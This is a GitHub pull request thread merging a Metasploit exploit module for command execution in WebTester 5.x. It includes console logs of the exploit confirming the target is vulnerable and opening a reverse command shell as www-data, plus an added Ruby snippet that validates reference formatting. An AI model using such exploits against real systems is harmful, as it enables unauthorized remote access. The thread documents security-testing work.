Add WebTester 5.x Command Execution exploit module #2534

Merged
merged 1 commit into from Oct 17, 2013


@bcoles
Contributor
bcoles commented Oct 17, 2013

Add WebTester 5.x Command Execution exploit module.

Homepage: http://sourceforge.net/projects/webtesteronline/
Tested on: WebTester v5.1.20101016

WebTester 5.x Command Execution exploit module

Check

msf exploit(webtester_exec) > check

[*] 192.168.124.180:80 - Found version: 5.1.20101016
[+] The target is vulnerable.

Run

msf exploit(webtester_exec) > run
[*] Started reverse double handler

[*] 192.168.124.180:80 - Sending payload (539 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.124.180:80 - Payload sent successfully
[*] Command: echo 9gnSokBtJDgOQ1hA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "9gnSokBtJDgOQ1hA\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command shell session 1 opened (192.168.124.180:4444 -> 192.168.124.180:33093) at 2013-10-17 03:20:00 -0400
[*] Command: echo fCm8SMWnLUpfSz5C;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C

@jvazquez-r7
Contributor

Thanks @bcoles ! Processing in a while!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 17, 2013
jvazquez-r7 Land #2534, @bcoles's exploit for webtester 5 955fc4e
@jvazquez-r7 jvazquez-r7 merged commit 54cf785 into rapid7:master Oct 17, 2013

1 check passed

default The Travis CI build passed
@jvazquez-r7
Contributor

Landed, minor cleanup here: 352eca1

Test result:

msf exploit(webtester_exec) > check

[*] 192.168.172.134:80 - Found version: 5.1.20101016
[+] The target is vulnerable.
msf exploit(webtester_exec) > exploit

[*] 192.168.172.134:80 - Sending payload (523 bytes)...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.172.134:80 - Payload sent successfully
[*] Command: echo pW1ZYmmUYe4XOABJ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "pW1ZYmmUYe4XOABJ\r\n"
[*] Matching...
[*] B is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
i[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.134:57945) at 2013-10-17 09:31:56 -0500
[*] Command: echo NaH1Rb7vErGFmN3K;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "NaH1Rb7vErGFmN3K\r\n"
d
^R
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.134 - Command shell session 1 closed.  Reason: User exit

Thanks @bcoles !

@limhoff-r7

'References' expects its value to be Array<Array<(String, String)>>. (An Array of two-element Arrays). This should be ['URL', 'https://sourceforge.net/p/webtesteronline/bugs/3/']. It is being silently ignored on master, but should be fixed.
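
The shape described in the comment above, as an added example that is not part of the original thread or of Metasploit's code: a stand-alone Ruby check that accepts only an Array of two-element String Arrays and reports anything else instead of letting it pass silently. `reference_shape_errors` and the sample values are hypothetical; only the URL is taken from the comment.

```ruby
# Added example: stand-alone shape check for a module's 'References' value.
# reference_shape_errors is a hypothetical helper, not a Metasploit API.

# Returns an Array of problem descriptions; an empty Array means the value
# is an Array of two-element Arrays of Strings, e.g. [['URL', 'https://...']].
def reference_shape_errors(refs)
  return ["'References' must be an Array, got #{refs.class}"] unless refs.is_a?(Array)

  # A flat pair such as ['URL', 'https://...'] is one reference that is
  # missing its outer Array, so report it as a single problem.
  if refs.length == 2 && refs.all? { |e| e.is_a?(String) }
    return ["flat pair #{refs.inspect}: wrap it as [#{refs.inspect}]"]
  end

  errors = []
  refs.each_with_index do |ref, i|
    if !ref.is_a?(Array)
      errors << "entry #{i} is a #{ref.class}, expected a two-element Array"
    elsif ref.length != 2
      errors << "entry #{i} has #{ref.length} elements, expected 2"
    elsif !ref.all? { |e| e.is_a?(String) }
      errors << "entry #{i} must contain only Strings: #{ref.inspect}"
    elsif ref.any?(&:empty?)
      errors << "entry #{i} has an empty type or value"
    end
  end
  errors
end

# Constructed sample values; the URL is the one quoted in the comment.
BUG_URL = 'https://sourceforge.net/p/webtesteronline/bugs/3/'
SAMPLES = {
  'correct'     => [['URL', BUG_URL]],
  'flat pair'   => ['URL', BUG_URL],
  'bare string' => [BUG_URL],
  'hash entry'  => [{ 'URL' => BUG_URL }],
  'three items' => [['URL', BUG_URL, 'extra']]
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |name, value|
    problems = reference_shape_errors(value)
    puts "#{name}: #{problems.empty? ? 'ok' : problems.join('; ')}"
  end
end
```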
